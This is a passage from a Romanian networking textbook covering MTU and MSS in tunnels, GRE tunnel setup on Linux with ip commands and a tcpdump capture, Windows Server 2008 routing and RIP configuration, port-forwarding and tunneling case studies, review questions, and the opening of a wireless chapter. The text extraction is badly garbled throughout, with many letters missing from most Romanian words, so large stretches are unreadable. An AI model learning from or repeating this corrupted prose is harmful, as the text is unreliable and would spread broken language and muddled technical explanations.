se u itatea u ei eţele i tuale p i ate u ai poate fi asigu ată doa p i tu ela e, fii d
e esa ă şi ipta ea t afi ului.
Ca e este o se i ţa eşte ii lu gi ii pa hetelo p i adăuga ea u ui ou a tet î azul
tu elă ii?
Atâta e e ât pa hetele p i adăuga ea oului a tet se î ad ează î di e siu ea
a i ă a ad ului o teţi , adăuga ea oului a tet de tu ela e a e u i pa t i o
pe t u pe fo a ţele eţelei.
Da ă, î s hi , se a aju ge la tu ela ea pa hetelo a e după î apsula ea de i el
eţea au deja de o teţi, p i adăuga ea u ui ou a tet se a depăşi di e siu ea a i ă
i pusă de p oto olul de i el legătu ă de date, î a est az u â d să apa ă o f ag e ta e în
două ad e. Astfel fie a e ad u a e î u a tu elă ii a depăşi de o teţi a fi î pă ţit î
două ad e. Chia şi î azul î a e e istă u t afi susţi ut î t e a eaşi su să şi desti aţie,
t afi azat pe t asfe ul de ad e de lu gi e a i ă, î u a tu elă ii se a du la u ă ul de
pa hete. Deşi ju ătate di pa hete o fi de di e siu e i i ă, a estea o fi t a s ise
i di idual, deoa e e o ple itatea o ate ă ii lo î u ul sau ai ulte ad e de lu gi e
a i ă este o side ată p ea a e.
Î i ple e tă ile uzuale se do eşte u u ai e ita ea o ate ă ii f ag e telo de
lu gi e i i ă, da hia e ita ea f ag e tă ii. A est lu u se ealizează p i i pu e ea u ei
di e siu i a i e datelo î ai te de î apsula ea de i el eţea.
MTU (Maximu T a sfe U it ep ezi tă di e siu ea a i ă a pa hetelo după
î apsula ea de i el eţea.
MSS Ma i u “eg e t “ize ep ezi tă di e siu ea a i ă a pa hetelo î ai te de
î apsula ea de i el eţea.
În cazul trasferului traficului IPv4 peste un tunel IP , se defi eşte M““ a fii d u de
o teţi ai i de ât MTU, a eşti de o teţi ep eze tâ d ele două a tete IP e o fi
adăugate la i elul eţea.
Pe t u a e ita f ag e ta ea, li ita ea M““ t e uie ope ată pe staţia su să. Pe t u a easta
în siste ele Wi do s t e uie odifi ate două hei î aza de date de egişt i, ia î Li u
limitarea se impune prin configurarea iptables.
4.6.4 Configurarea tunelului GRE în Linux

Î se ţiu ea 4.6.3 s-a prezentat conceptul de tu ela e şi se e o a dă pa u ge ea
a esteia î ai tea se ţiu ii u ătoa e.
GRE1 (Generic Routing Encapsulation este u p oto ol de tu ela e a e î apsulează
dife ite i fo aţii î pa hete IP. Li u pe ite ea ea de tu ele G‘E u ajuto ul odulului
ip_gre:
valhalla:/home/razvan# lsmod | grep ip_gre
ip_gre 15620 0
C ea ea tu elelo G‘E se ealizează u ajuto ul utilita ului iproute2 prin intermediul

comenzii ip tunnel.
1
150 | ‘ e ţ e l e L o a l e
Folosi ea tu elelo G‘E î Li u a fi e e plifi ată p i t -un s e a iu tipi . E istă două

eţele A şi B i te o e tate p i t -o eţea C. ‘eţelele A şi B deţi staţii u ad ese p i ate.
Routerul R1 este folosit pe post de gateway de eţeaua A, ia routerul R2 este folosit pe post
de gate a de eţeaua B.
I fo aţiile aso iate elo două eţele su t p eze tate î ta elul de ai jos:
Reţea A Reţea B
Adresă reţea 172.16.68.0/24 Adresă reţea 10.38.0.0/16
Adresă internă R1 172.16.68.1 Adresă internă R1 10.38.0.1
Adresă externă R1 141.85.37.178 Adresă externă R1 141.85.37.1
Adresă sistem de test 172.16.68.128 Adresă sistem de test 10.38.6.123
Pe t u eţeaua A se eează tu elul netb şi i te faţa u a elaşi u e:

valhalla:~# ip t add netb mode gre remote 141.85.37.1 local 141.85.37.178 ttl 255
valhalla:~# ip l set netb up
valhalla:~# ip addr add 172.16.68.1 dev netb
valhalla:~# ip route add 10.38.0.0/16 dev netb
‘uta ăt e eţeaua B este i te ediată de i te faţa i tuală netb aso iată tu elului G‘E.
La fel, pe t u eţeaua B se eează tu elul eta şi i te faţa u a elaşi u e:
root@csr:~# ip t a neta mode gre remote 141.85.37.178 local 141.85.37.1 ttl 255
root@csr:~# ip l set neta up
root@csr:~# ip a a 10.38.0.1 dev neta
root@csr:~# ip r a 172.16.68.0/24 dev neta
Î a est o e t, deşi aflate î eţele p i ate, staţiile pot comunica unele cu celelalte. Prin
tu elul folosit toate pa hetele de la staţiile di eţeaua A o aju ge la staţiile di eţeaua B. O
aptu ă de pa hete folosi d tcpdump a e u ăto ul o ţi ut:
22:07:36.819507 IP 141.85.37.178 > 141.85.37.1: GREv0, length 88: IP 172.16.68.128 >
10.38.6.123: ICMP echo request, id 41995, seq 1, length 64
22:07:36.820140 IP 141.85.37.1 > 141.85.37.178: GREv0, length 88: IP 10.38.6.123 >
172.16.68.128: ICMP echo reply, id 41995, seq 1, length 64
22:07:37.827154 IP 141.85.37.178 > 141.85.37.1: GREv0, length 88: IP 172.16.68.128 >
10.38.6.123: ICMP echo request, id 41995, seq 2, length 64
22:07:37.827657 IP 141.85.37.1 > 141.85.37.178: GREv0, length 88: IP 10.38.6.123 >
172.16.68.128: ICMP echo reply, id 41995, seq 2, length 64
“e o se ă a staţia u ad esa . . . di eţeaua A t a s ite pa hete IMCP Echo

e uest ăt e staţia u ad esa . . . di eţeaua B, ia a easta îi ăspu de. Toată
o u i aţia este î apsulată î tu elul G‘E. Pa hetele ICMP su t î apsulate în pachete IP în
a e ad esele IP su să, espe ti desti ate su t ad esele IP e te e ale routerelo ‘ şi ‘ .
4.7 Rutarea în Windows Server 2008

4.7.1 Routing and remote access services
Dispoziti ul a e eu eşte două seg e te sepa ate de eţea de u ite şi su eţele, î

o te tul eţelelo TCP/IP este de u it, ge e i , u oute . P i ipalul ol al u ui oute este
de a de ide da ă pa hetele a e soses la el t e uie să aju gă sau u î t -un alt segment de
eţea o e tat la a esta.
Majo itatea eţelelo foloses e hipa e te dedi ate î a est s op, al ută ii. A estea
ep ezi tă soluţii hardware e fu ţio ează u p op iile siste e de ope a e Cis o, Ju ipe ,
et şi su t desti ate eţelelo de ă i e edie şi a e.
Windows Server 2008 ofe ă o soluţie software pentru rutare prin intermediul serviciilor
grupate sub denumirea de Routing and Remote Access. Din punct de vedere hardware,
si gu ele odifi ă i e esa e pe t u a i ple e ta u p o es de uta e folosi d Windows
Server 2008 su t u a sau ai ulte plă i de eţea supli e ta e.
“oluţiile software pe t u uta e ep ezi tă o alte ati ă ia ilă pe t u azu ile î a e u
este e esa ă i ple e ta ea u o soluţii dedi ate: izola ea a i i seg e te de eţea sau
folosirea serverului ca gateway spre Internet pentru o eţea lo ală de i i di e siu i. Î azul
în care Windows Server 2008 este i stalat pe u siste u ol de gate a , e istă opţiu ea de a
ula şi se i iul de NAT Network Address Translation) pentru a oferi conectivitate în exterior
u ei eţele a e folosește ad ese p i ate p i t -o si gu ă ad esă pu li ă.
P i ipiul de fu ţio a e a p o edeului de uta e î Windows Server 2008 este a elaşi a şi
în cazul echipamentelor dedicate: deciziile sunt luate pe baza rutelor din tabela de rutare. În
plus, serviciul de Routing and Remote Access poate fi o figu at atât pe t u ute stati e ât şi
pe t u ute di a i e, o ţi ute p i i te ediul u ui p oto ol de uta e. I t u ât Windows
Server 2008 este o eput a o soluţie de uta e pe t u eţele de di e siu e i ă, p oto olul
de rutare suportat este RIP (Routing Internet Protocol).
Pentru a putea folosi serviciul de rutare în Windows Server 2008 este e esa ă adăuga ea
acestuia ca rol al serverului, din Server Manager. Pentru aceasta, de la linkul Add roles se
sele tează Network Policy and Access Services. Î o ti ua e, î ai te de i stala e, se ofe ă
opţiu ea de a sele ta su o po e te ale a estui ol. Pe t u uta e este e esa ă sele ta ea
Routing and Remote Access Services, cu ambele sale componente: Remote Access Service şi
Routing (figura 4-6).
4-6: Instalarea serviciului de Routing and Remote Access Services
Pentru a putea configura rutarea prin RRAS trebuie activat întâi serviciul. Acestea pot fi
realizate prin consola Server Manager. După i stala e, Routing and Remote Access poate fi
găsit su Network Policy and Access Services în cadrul rolurilor serverului.
Co figu a ea i iţială şi po i ea se i iului se fa e p i selectarea Routing and Remote
Access şi a esa ea e iului More Actions di pa oul de a ţiu i u ată de alege ea opţiu ii
Configure and Enable Routing and Remote Access.
Ate ţie, nu se poate activa sau configura serviciul de rutare pe Windows Server 2008 atât
ti p ât aşi a pe a e este i stalat se i iul ealizează pa taja ea u ei o e iu i la I te et.
Înainte de a porni configurarea conform descrierii de mai sus, trebuie dezactivat ICS (Internet
Connection Sharing) pentru toate conexiunile, din interfaţa Net o k Co e tio s.
152 | ‘ e ţ e l e L o a l e
4-7: Configurarea RRAS
P i t e opţiu ile dipo i ile i iţial se e u e ă o figu a ea VPN sau NAT. Pe t u

o figu a ea ută ii se a alege opţiu ea Custom Configuration (figura 4-7).
În continuare, din meniul Custom Configuration se alege LAN routing (figura 4-8).
4-8: A ti area rutării
Pentru ca rutarea să se poată ealiza, u se e t e uie să ai ă o e ti itate de i el u

toate eţelele î a e a e âte o i te faţă deja o figu ată. De a eea, după o epe ea
s he ei de ad ese e a fi i ple e tată, t e uie o figu ată fie a e i te faţă de eţea e a
i te e i î p o esul de uta e u âte o ad esă stati ă di su eţeaua o espu zătoa e ei,
î p eu ă u as a de eţea ade ată. De ase e ea, staţiile di eţelele i te o e tate de
ăt e se e t e uie să ai ă i te faţa a estuia, ea a e se află î a eeași su eţea u
espe ti a staţie, o figu ată a default gate a pe t u a putea o u i a î afa a eţelei
p op ii. Co figu a ea stati ă a pa a et ilo de eţea, atât pe t u IP ât şi pe t u IP se fa e
di fe east a de p op ietăţi a fie ă ei o e iu i, după u s-a e pli at î se ţiu ea 3.4.4.
Lista i te feţelo , a tipu ilo o e iu ilo şi a stă ilo lo pot fi izualizate di Server
Manager, în cadrul rolului Routing and Remote Access, selectând Network Interfaces (figura
4-9).
4-9: “tarea i terfețelor de rețea di siste
Pe t u a afişa i fo aţiile de i el , î p eu ă u statisti i de t afi pe t u fie a e

i te faţă şi ai ulte detalii desp e sta ea o e iu ilo , se poate sele ta General din cadrul
p op ietăţilo de tip IP sau IP , su Routing and Remote Access (figura 4-10).
4-10: “tarea o figurațiilor IP a i terfețelor de rețea
4.7.1.1 Configurarea rutelor statice

O ută stati ă ep ezi tă o ută i t odusă a ual de ăt e ad i ist ato , fi ă, e u
ea ţio ează la s hi ă ile di topologie. Î Wi do s, ea este defi ită p i :
 o i te faţă, lo ală se e ului, pe a e uta a fi i stalată;
 o ad esă desti aţie, a e poate fi ad esa u ei staţii sau ad esa u ei su eţele;
 o as ă de eţea, folosită î p eu ă u ad esa a te ioa ă pe t u a defi i e a t desti aţiile
rutei;
 un gateway, adi ă ad esa dispoziti ului a e ealizează o e iu e i t e eţele. I te faţa
spe ifi ată a gateway este ea a e a p i i pa hetele e o utiliza a eastă ută;
 et i ă, o etodă de a „ ăsu a utele şi, î p i ul â d, pe t u a dife e ţia ute ultiple
sp e a eeaşi desti aţie.
Pe t u a ea o ută stati ă se alege î tâi atego ia, IP sau IP di ad ul olului Routing

and Remote Access ia di pa oul de a ţiu e se alege More Actions > New Static Route
şi se o pletează pa a et ii des işi ai sus.
După ea e, utele stati e o apă ea listate la atego ia o espu zătoa e IPV sau IP ,
pot fi editate prin dublu- li şi şte se sele tâ du-le şi apăsâ d Delete î pa oul de a ţiu i. De
asemenea, rutele devin active imediat ce au fost configurate.
154 | ‘ e ţ e l e L o a l e
4-11: Parametrii unei noi rute statice
4-12: Listarea rutelor statice
4.7.1.2 Co figurarea rutării di a i e

Î ede ea o figu ă ii ută ii di a i e, Windows Server 2008 supo tă doa p oto olul de
rutare RIP (Routing Internet Protocol), versiunea 2 (RIP v2). Windows Server 2003 supo ta şi
protocolul OSFP (Open Shortest Path First) dar acesta a fost eliminat din Windows Server 2008,
si gu a opţiu e pe t u p opaga ea di a i ă a utelo ă â â d utiliza ea lui ‘IP.
P oto olul ‘IP fu ţio ează i felul u ăto : t i ite tutu o e i ilo a e ulează a elaşi
p oto ol î t eaga ta elă de uta e la fie a e de se u de, fie a e lie t a tualizâ du-şi la
â dul său p op ia ta elă de uta e da ă apa odifi ă i î datele p i ite de la e i i. A est
od de fu ţio a e u îl fa e ade at pe t u i f ast u tu i a i, î a e o e ge ţa apidă şi
efi ie tă este o e i ţă i po ta tă. Totuşi, i i uta ea î soft a e u este e o a dată în
a este azu i, de i pe t u situaţiile î a e Windows Server 2008 se p etează a oute , este
a epta ilă şi pe fo a ţa pe a e o ofe ă ‘IP.
Pe t u a adăuga se e ului p oto olul de uta e ‘IP se u ează paşii:
1. “e e pa dează u ul di t e odu ile IP din cadrul Routing and Remote Access, din Server
Manager. “e poate alege atât IP ât şi IP pe t u a p opaga ute folosi d ‘IP.
2. Se face clic dreapta pe General şi se alege New Routing Protocol di e iu. La fel, opţiu ea
este dispo i ilă şi î pa oul de a ţiu i. Este afişată o listă ase ă ătoa e u ea di figu a
4-13).
4-13: Selectarea RIP v2 ca protocol de rutare
3. “e sele tează ‘IP di listă după a e este adăugat automat un nou nod denumit RIP în cadrul
versiunii IP selectate. Selectarea lui RIP pentu IPv4, spre exemplu, nu va configura automat
folosi ea ‘IP şi pe t u IP . Da ă se do eşte folosi ea ad eselo IP , ‘IP t e uie adăugat
explicit pentru acestea.
4.7.1.2.1 Interfeţe RIP

Pe t u a ‘IP să poată fu ţio a, t e uie să i se o u i e pe e i te feţe să uleze. Mai
ult, toate setă ile ulte ioa e a e i flue ţează o po ta e tul ‘IP-ului se fac la nivel de
i te faţă.
1. A â d odul ‘IP sele tat eat după p o edu a des isă ai sus , se poate fa e li d eapta pe
acesta, alegându-se opţiu ea New Interface sau di pa oul de a ţiu i şi se alege o i te faţă
pe care protocolul RIP va rula (figura 4-14).
4-14: I terfața pe are a rula RIP
2. La apăsa ea uto ului OK, este afişată fe east a de p op ietăţi a i te feţei sele tate figu a
4-15).
3. Pagi a de p op ietăţi ge e ale ofe ă posi ilitatea sele tă ii e siu ii de ‘IP folosite atât î
esajele a eptate ât şi î ele t i ise. Folosi ea e siu ii i pli ă o se ie de li ită i
supli e ta e da este e esa ă da ă alte e hipa e te di eţea o supo tă doa pe a easta.
4. Pagina de securitate permite seta ea u o pa a et i legaţi de a epta ea utelo . E istă
posibilitatea de a accepta toate rutele, sau de a accepta sau ignora rutele dintr-un anumit
interval.
5. “etă ile legate de e i ii u a e se efe tuează s hi ul de ute i lud posi ilitatea de a folosi
mesaje multicast (implicit) sau a celor unicast pentru a contacta anumiti vecini (fie în locul
mesajelor multicast, fie î p eu ă u ele .
6. Pagi a de p op ietăţi a a sate pe ite odifi a ea u o pa a et i a f e e ţa de t i ite e a
a tualiză ilo , a ti a ea sau deza ti a ea u o fa ilităţi a split-horizon sau poison-reverse, etc.
156 | ‘ e ţ e l e L o a l e
4-15: Proprietățile u ei i tefețe RIP
După alida ea o figu ă ii, i te faţa a apă ea î lista i tefeţelo a ti e pe t u ‘IP. Pot fi
adăugate o i âte alte i te feţe epetâ d a eeaşi p o edu ă.
Mo ito iza ea a ti ităţii de uta e se ealizează di a eeaşi o solă ad i ist ati ă. “p e
e e plu, pe t u a izualiza o listă a e i ilo a e ulează ‘IP, se poate sele ta odul ‘IP di
u a di t e atego iile IP sau IP şi apoi se poate alege opţiu ea Show Neighbors. Starea
i te feţelo i luse î p o esul de uta e poate fi izualizată p i odul General din cadrul
p oto olului IP o espu zăto . De ai i poate fi izualizată ta ela de rutare pentru fiecare
i te faţă, p i sele ta ea u eia şi alege ea opţiu ii Show IP Routing Table din meniul
contextual.
4.8 Studii de caz

4.8.1 Încapsularea pachetelor: exemplificare port forwarding
4-16: Încapsularea pachetelor
Î eţeaua dată, pe t u ele două eţele u s it hu i s-au folosit adrese private, astfel R1
şi R3 o asigu a t a slata e de ad esă u sup aî ă a e PAT . “e a o side a ă ta elele
A‘P di eţea au fost o figu ate static pentru toate desti aţiile. Des ieţi a tetele pa hetelo
apă ute î eţea î azul î a e A fa e o si gu ă e e e HTTP ăt e staţia E.
Rezolvare:
Pe t u topologia de ai sus p i ipala p o le ă o ep ezi tă asigu a ea a esi ilităţii
staţiei E di e te io ul eţelei private.
Da ă a fi fost dispo i il u eze o de ad ese pu li e pe t u a ealiza t a slata ea de
ad esă, soluţia a fi fost i ple e ta ea “NAT static NAT): definirea unei asocieri de
translatare pe routerul R3 între una dintre adresele publice din rezer o şi ad esa p i ată a lui
E. Pe t u p o le a de faţă, u dispu e de ad ese pu li e supli e ta e, t a slata ea fii d
ealizată p i sup aî ă a ea ad esei pu li e <R3, e0>.
Routerul R3 asigu ă t a slata ea u sup aî ă a e, si gu a opţiu e î a est az fiind
implementarea port forwarding, adi ă ea ea pe R3 a u ei aso ie i î t e pe e hea ad esă
pu li ă a lui R3, po t şi pe e hea ad esă p i ată a lui E şi po t. “p e e e plu, da ă se do eşte
ula ea u ui se i iu de e pe staţia E, în serviciul de nume a fi pu li ată aso ie ea di t e
u ele do e iului fie a esta .test. o şi ad esa pu li ă a lui ‘ adi ă IP R3(e0)).
Apoi este defi ită pe R3 asocierea de translatare: <IP R3(e0), 80> – <IP E, 80>. În acest
o e t, o i e e e e p i ită de R3 pe portul 80 u a ai fi t e ută ăt e i elul apli aţie
i lusi oute ul a putea ula u se e de e lo al , i a fi t a slatată şi t i isă ăt e staţia
E.
‘e e i d la p o le a de faţă, dato ită populă ii stati e a ta elelo A‘P pe t u toate
desti aţiile u o ai e ista pa hete de e e e/ ăspu s A‘P. Popula ea stati ă a ta elelo
158 | ‘ e ţ e l e L o a l e
A‘P este folosită î p a ti ă doa a o etodă de p e e i e a u o ata u i ezi ap ef ,

da dato ită s ala ilităţii g eoaie este a eo i i ple e tată.
“e p esupu e ă î eţea este folosit default gateway.
“ it hu ile o o uta pa hetele fă ă a le alte a, î e e e fie a e oute a ope a el
puţi s hi a ea a tetului de i el ; astfel pa hetul de la A la E va suferi 3 rescrieri.
1. Pachetul trimis de A ăt e E (adi ă î afa a eţelei lo ale a fi desti at la i el
oute ului de ieşi e, ia la i el ad esei o ţi ute î u a ezol ă ii de u e, adi ă ad esei
publice a lui R3. Pa hetul fii d u ul de e e e HTTP po tul desti aţie a fi :
MAC[A] MAC[R1(e0)] IP[R3(e0)] IP[A] 80 9494 date
2. Pachetul ajuns pe R1 a fi t a slatat, astfel ă pe lâ gă es ie ea a tetului de i el , se

o es ie â pu ile su să de i el şi :
FFFF:FFFF:FFFF IP[R3(e0)] IP[R1(s0)] 80 43911 date
3. Ruterul R2 nu va realiza decât rescrierea antetului de nivel 2:
MAC[R3(e0)] MAC[R2(e0)] IP[R3(e0)] IP[R1(s0)] 80 43911 date
4. Ruterul R3 a ealiza ope aţia efe ti ă de port forwarding:
MAC[E] MAC[R3(e2)] IP[E)] IP[R1(s0)] 80 13821 date
Implementarea port forwarding nu impune co se a ea po tului desti aţie, altfel spus

staţia E poate rula serverul de web pe orice alt port, iar translatarea va reflecta asocierea.
Da ă se e ul de e a fi fost o figu at să as ulte pe po tul si gu a odifi a e faţă de
analiza de mai sus ar fi defi i ea t a slată ii pe R3 (<IP R3(e0), 80> – <IP E, 999>) şi
antetul pachetului 4:
MAC[E] MAC[R3(e2)] IP[E)] IP[R1(s0)] 999 13821 date
4.8.2 Încapsularea pachetelor: exemplu de tunelare

Fie topologia di figu ă:
4-17: Exemplu de tunel

‘ute ul A a asigu a t a slata ea de ad ese pe t u î t eaga eţea . . . / , ia oute ul

B a tu ela tot t afi ul di eţeaua . . . / şi îl a t i ite p i i te faţa sa i tuală
tunnel0. Tunelul este stabilit între 194. . . şi . . . . Î plus, uta ea este asigu ată
folosi d ute stati e atfel: pe oute ele A şi D utele su t p e izate p i ad esa u ăto ului
hop, ia pe B şi C utele su t p e iza e doa p i i te faţa de ieşi e.
“e o side ă ă î u a u ei pe e de u e t toate e hipa e tele su t p oaspăt
ei iţializate. “taţia X a a esa u se e de e aflat pe staţia ). Ca e o fi a tetele tutu o
ad elo e o fi t i ise î eţea pe t u a li a e e ea e isă de staţia X la staţia )?
Pachetul de cerere web a t e e p i eţele şi pe t u a fi li at o ge e ate ad e:

FFFF:FFFF:FFFF MAC[X] 10.1.1.1 10.1.1.12 Date
MAC[X] MAC[A(e0)] 10.1.1.12 10.1.1.1 Date
MAC[A(e0)] MAC[X] 114.5.1.7 10.1.1.12 80 55555 Date
FFFF:FFFF:FFFF MAC[A(e1)] 201.9.4.2 201.9.4.1 Date
MAC[A(e1)] MAC[B(e1)] 201.9.4.1 201.9.4.2 Date
MAC[B(e1)] MAC[A(e1)] 114.5.1.7 201.9.4.1 80 51311 Date
FFFF:FFFF:FFFF MAC[B(e0)] 194.2.1.1 194.2.4.6 Date
MAC[B(e0)] MAC[C(e0/6)] 194.2.4.6 194.2.1.1 Date
MAC[C(e0/6)] MAC[B(e0)] 194.2.1.1 194.2.4.6 114.5.1.7 201.9.4.1 Date
FF 194.2.1.1 194.2.4.6 114.5.1.7 201.9.4.1 Date
FFFF:FFFF:FFFF MAC[D(e7)] 114.5.1.7 114.5.1.1 Date
MAC[D(e7)] MAC[Z] 114.5.1.1 114.5.1.7 Date
MAC[Z] MAC[D(e7)] 114.5.1.7 201.9.4.1 Date
După p i i ea pa hetului de date de la oute ul A, oute ul B t e uie să îl t i ită ăt e

ieşi ea di tu el, şi a u e ăt e ad esa . . . . ‘oute ul B u ştie î să ad esa IP a
u ăto ului hop, i doa i te faţa de ieşi e p i a e t e uie să t i ită pa hetul. De a eea, p i
i te faţa Ethe et a e ite „i o e t o e e e A‘P pe t u a afla ad esa fizi ă
o espu zătoa e IP-ului . . . . ‘oute ul C, a e ulează proxy ARP îşi dă sea a p i
e ifi a e u as a de eţea ă ad esa IP desti aţie pe t u a e B aută ad esa fizi ă u se
află î a eeaşi eţea şi ă e e ea A‘P u a aju ge i iodată la . . . , şi de a eea îi a
î toa e lui B u ăspu s A‘P î a e „ i te ă ad esa MAC o espu zătoa e ip-ului 194.2.1.1
este hia ad esa MAC a i te feţei sale pe a e a p i it e e ea şi a u e e / . Pa hetul
aju s la C a o ţi e ad esele eale desti aţie şi su să „as u se î se ţiu ea de date. A est
pachet va transmis pe legatura se ială păst â d a ad esa IP su să i t a ea î tu el şi ad esă IP
desti aţie ieşi ea di tu el a şi u C u a e ista .
160 | ‘ e ţ e l e L o a l e
Î tre ări
1. Existenţa unei intrări în tabela de rutare de forma 141.85.37.0/24 141.85.254.37
înseamnă:
 trimite toate pachetele e ite di eţeaua . . . / ăt e . . .
 t i ite toate pa hetele e ite ăt e eţeaua . . . / ăt e . . .
 t i ite toate pa hetele e ite di eţeaua . . . / , sau di o i e altă su eţea
up i să î a est spaţiu de ad ese, ăt e . . .
 t i ite toate pa hetele e ite ăt e eţeaua . . . / , sau ăt e o i e altă
su eţea up i să î a est spaţiu de ad ese, ăt e . . .
2. Decizia de a ruta sau nu un pachet se bazează pe:

 Ad esa su să
 Ad esa desti aţie
 Adresa su să şi po tul su să
 Ad esa desti aţie şi po tul desti aţie
3. Fie tabela de rutare de mai jos:

194.230.85.0 /26 172.17.0.9 E0
200.230.85.128 /26 - S0
194.230.85.0 /24 194.230.5.65 E1
Şi o ouă ută: . .5.0/30 “ . Noua ută a fi i se ată pe:
 p i a poziţie
 după p i a ută deja e iste tă
 după ea de a doua ută deja e iste tă
 ulti a poziţie î ta ela de uta e
4. Către ce interfaţă va fi rutat un pachet destinat pentru 171.15.68.0 dacă tabela de rutare
este cea de mai jos:
171.15.63.0 /24 172.17.0.9 S0
171.15.64.0 /23 - S1
0.0.0.0 /0 194.230.5.65 S2
 va fi trimis pe S0
 nu va fi rutat
5. Fie două routere. Primul are următoarele adrese asignate: 7.1.1.1/24 – S0 şi 7.1.3.1 – S
1, al doilea 7.1.3.2/24 – S0 şi 7.1.2.1 – S1. Care este numărul minim de rute ce trebuie adăugat
pe routerul 1 pentru a asigura comunicaţia între 7.1.1.0/24 şi 7.1.2.0/24?
 7.1.2.1 / 24 S1
 tot ce e mai sus plus: 7.1.2.1 /24 S0
 tot ce e mai sus plus: 0.0.0.0 /0 S1
 doar: 0.0.0.0 /0 S1
6. Care dintre următoarele descrie cel mai bine convergenţa reţelei?

 când mesajele ating simultan un router şi apa e o oliziu e
 când mai multe routere utează si ulta pa hete pe a eeaşi ale
 când mai multe routere într-o eţea au a eleaşi u oşti ţe desp e st u tu a şi topologia
eţelei
 â d ai ulte esaje su t t i ise sp e a eeaşi desti aţie
7. Timpul cel mai redus de convergenţă îl au:

 p oto oalele de uta e stati ă
 proto oale azate pe e to i de dista ţă
 protocoalele bazate pe starea conexiunii
 protocoalele de rutare inter-AS
8. Care este metrica folosită de RIP pentru determinarea căii optime?

 u ă ul de routere pâ ă la desti aţie
 î ă a ea lăţi ii de a dă
 lăţi ea de a dă pâ ă la desti aţie
 niciunul di t e ăspu su ile de ai sus
9. Fie NET1, o reţea direct conectată la un router. Acest router rulează RIP şi OSPF şi
primeşte de la un router adiacent în cadrul procesului de actualizare informaţii despre NET1,
atât prin RIP, cât şi prin OSPF. Câte rute către NET1 vor fi în tabela de rutare la încheierea
procesului de actualizare?
 0
 1
 2
 3
10. Care este metrica folosită de BGP?

 u ă ul de routere pâ ă la desti aţie
 î ă a ea lăţi ii de a dă
 lăţi ea de a dă pâ ă la desti aţie
 niciunul di t e ăspu su ile de ai sus
162 | ‘ e ţ e l e L o a l e
5 Wireless
„The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very
long cat. You pull the tail in New York, and it meows in Los Angeles. The wireless is the same,
only without the cat.
Albert Einstein
Ce se î vaţă din acest capitol?

 Fu ţio a ea teh ologiei wireless la nivel fizic
 Standardele wireless pe t u eţele lo ale
 I ple e ta ea eţelelo wireless
 Securitatea în mediul wireless
 Co figu ă i pe t u eţele wireless în Linux
 Co figu ă i pe t u eţele wireless în Windows
Cine este...
Nikola Tesla este u i e tato și u o de știi ţă î do e iul ele t i ităţii. Mai ulţi
iog afi o te po a i îl o side ă pe Tesla „o ul a e a i e tat se olul . Pate tele și
descoperirile teoretice ale lui Tesla au format baza sistemelor de curent electric alternativ.
Î a de o st at pe t u p i a oa ă posi ilitatea o u i aţiei fă ă fi u de adio .
Este o side at des ope ito ul o u i aţiei fă ă fi .
5.1 Introducere în reţele wireless

5.1.1 Introducere în comunicarea wireless
Pe fo dul u ei e oi de o ilitate şi o e ti itate di e î e ai es ute, o u i aţia
fă ă fi a î egist at o e plozie ful i a tă î ulti ii a i. ‘ăspâ di ea dispoziti elo o ile
(calculatoare notebook, PDA-uri sau smartphone-u i este ea a e a o dus î a e ăsu ă la
dez olta ea teh ologiilo de o u i aţie fă ă fi , fă ă a fi î să si gu ul oto . Te di ţa de
ig a e sp e digital pe t u o ga ă di e î e ai la gă de dispoziti e ge e ează de
asemenea o e oie de i te o e ta e es ută. Pe t u a estea, pe spe ti a o u i aţiei fă ă
fi este foa te at ăgătoa e. Moti ele p i ipale su t o ilitatea es ută şi edu e ea
ostu ilo pe t u dez olta ea i f ast u tu ii. Deşi î t e ut se u iza ea u ei eţele wireless se
do edise a fi o p o o a e la a e o ga izaţiile de sta da diza e î ă u ăspu sese ă, î
p eze t e istă ai ulte p oto oale sta da dizate a e pot ofe i o se u itate spo ită.
Cu toate acestea, tehnologia wireless u a e olul să o î lo uias ă pe ea u fi , i ai
deg a ă să o o pleteze. Moti ul p i ipal este lăţi ea de a dă: î ti p e Ethernet-ul a
aju s să ofe e Gbps, tehnologiile wireless a tuale u depăşes M ps M ps î azul
tehnologiilor în curs de standardizare).
În plus, dato ită utiliză ii s it hu ilo , teh ologia Ethernet asigu ă o o u i aţie full-
duple . Cu alte u i te, da ă ze e staţii u plă i Ethernet de M ps su t o e tate î a elaşi
s it h şi s it hul a e o apa itate de o uta e destul de a e, fie a e staţie a putea a ea
ga a tată, a da de M ps î eţeaua lo ală. De pa tea ealaltă, sta da dul wireless permite
u ei si gu e staţii să t a s ită la u o e t dat. A easta este o li ita e a ediului fizi şi a
p oie tă ii teh ologiei, deoa e e, î eţele wireless, u dispoziti foloseşte a eeaşi f e e ţa a
se alului si pe t u t a s isie si pe t u e epţie. Este i po ta t de eţi ut faptul ă î eţele
wireless, a da a i ă se î pa te la u ă ul de staţii.
163 | W i r e l e s s
5.1.2 Considerente de nivel fizic
5.1.2.1 Mediul fizic

Baza fizi ă pe t u o u i aţia fă ă fi o ep ezi tă u dele ele t o ag eti e, folosite î
f e e ţele ele ai pot i ite pe t u t a s isii de date. Mediul fizi de p opaga e al u delo
ele t o ag eti e u este de fapt e esa , ă i u se al wireless se poate p opaga fă ă
p o le e şi î id de a eea ăldu a şi lu i a soa elui aju g pe Pă â t . Câ d o i desp e
o u i aţia de date, p i ipala p op ietate a u delo este f e e ţă. Fu ţie de f e e ţa pe
a e o teh ologie fu ţio ează, se poate dete i a alitatea se alului î at osfe ă,
i te fe e ţa u alte dispoziti e, dista ţa de p opaga e a se alului şi hia şi lăţi ea de
a dă. Î figu a de ai jos este ep eze tat spe t ul ele t o ag eti di pu tul de ede e al
utiliză ii undelor de diverse frecvenţe î o u i aţii:
3 KHz 3 GHz 3 THz 300 PHz 30 EHz
Unde Unde radio Microunde Infra- Ultra- Raze Raze
Audio roşii violete X Gama
Lumină vizibilă
430 T H z-750 T H z
5-1: Be zi de fre e ță
F e e ţele folosite î eţele de al ulatoa e pe t u t a s isiile wireless se află î

intervalele de 2.4 - 2.4835 GHz, 5,725 - , GHz şi e e t adăugatul i te val de 5.47 - 5.725
GHz. Deci undele electromagnetice prin care se propaga semnalul wireless î o u i aţii de
date, sunt unde radio de î altă f e e ţă şi microunde.
În folosirea undelor electromagnetice pentru transmisii de date, trebuie avute în vedere
u ătoa ele o side e te fizi e:
 U dele ele t o ag eti e u su t la deli itate di pu t de ede e al p opagă ii, p e u
este se alul de pe u a lu de up u p otejat de u izolato . O i e dispoziti a e as ultă
ediul şi este î aza de p opaga e, poate e epţio a se alul wireless. Acesta este un
considerent de securitate foarte important.
